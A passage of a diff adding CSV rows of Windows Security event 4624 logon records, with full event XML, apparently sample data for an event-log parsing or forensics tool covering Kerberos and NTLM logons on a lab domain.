+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x21aadb8</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">860D1189-6C67-C57B-59ED-C0676A052019</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">62863</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-02T15:47:57.263194+04:00,1599047277.263194,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:57.252932Z"">
+    </TimeCreated>
+    <EventRecordID>2171295</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""2512"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x21aad4a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">860D1189-6C67-C57B-59ED-C0676A052019</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">62862</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-02T15:47:57.252932+04:00,1599047277.252932,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:49.966623Z"">
+    </TimeCreated>
+    <EventRecordID>2171294</EventRecordID>
+    <Correlation ActivityID=""4F7FBBE3-7BB5-0002-EBBB-7F4FB57BD601"">
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""4244"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x21aa47f</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">27FCE179-F80F-F6A6-7DF4-C247E783B072</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">62860</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-02T15:47:48.959767+04:00,1599047268.959767,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:48.842119Z"">
+    </TimeCreated>
+    <EventRecordID>2171292</EventRecordID>
+    <Correlation ActivityID=""4F7FBBE3-7BB5-0002-EBBB-7F4FB57BD601"">
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""4244"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-1106</Data>
+    <Data Name=""TargetUserName"">a-jbrown</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x21a8c9a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">467413FE-B054-D9AE-C758-B41105A3ECA9</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.142</Data>
+    <Data Name=""IpPort"">60726</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-02T15:47:48.842119+04:00,1599047268.842119,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:48.823276Z"">
+    </TimeCreated>
+    <EventRecordID>2171291</EventRecordID>
+    <Correlation ActivityID=""4F7FBBE3-7BB5-0002-EBBB-7F4FB57BD601"">
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""4244"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-1106</Data>
+    <Data Name=""TargetUserName"">a-jbrown</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x21a8c80</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">467413FE-B054-D9AE-C758-B41105A3ECA9</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.142</Data>
+    <Data Name=""IpPort"">60728</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-02T15:47:48.823276+04:00,1599047268.823276,4624,a-jbrown,3B,3,NtLmSsp,172.16.66.142,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:48.570502Z"">
+    </TimeCreated>
+    <EventRecordID>2171290</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""4244"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-1106</Data>
+    <Data Name=""TargetUserName"">a-jbrown</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x21a8c68</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">04246W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.142</Data>
+    <Data Name=""IpPort"">60726</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.889320+04:00,1557594610.88932,4624,IEUser,IEWIN7,9,seclogo,::1,,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.889320Z"">
+    </TimeCreated>
+    <EventRecordID>18206</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""492"" ThreadID=""564"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0x1371b</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">IEWIN7</Data>
+    <Data Name=""TargetLogonId"">0x1bbdce</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x3c8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-17T10:57:53.407618Z"">
+    </TimeCreated>
+    <EventRecordID>769798</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x85516e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">063B0961-D1B7-6D2C-1FF3-98764C4FAC9D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">53668</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-17T10:57:44.270428Z"">
+    </TimeCreated>
+    <EventRecordID>769794</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x853237</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49959</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:34.954809Z"">
+    </TimeCreated>
+    <EventRecordID>768628</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x32a0d3</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">6747BCF0-DBAA-F21C-878B-EB339B03FA80</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50441</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:32.206739Z"">
+    </TimeCreated>
+    <EventRecordID>768627</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x329baa</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50443</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:30:32.190369Z"">
+    </TimeCreated>
+    <EventRecordID>768622</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x320935</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50438</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
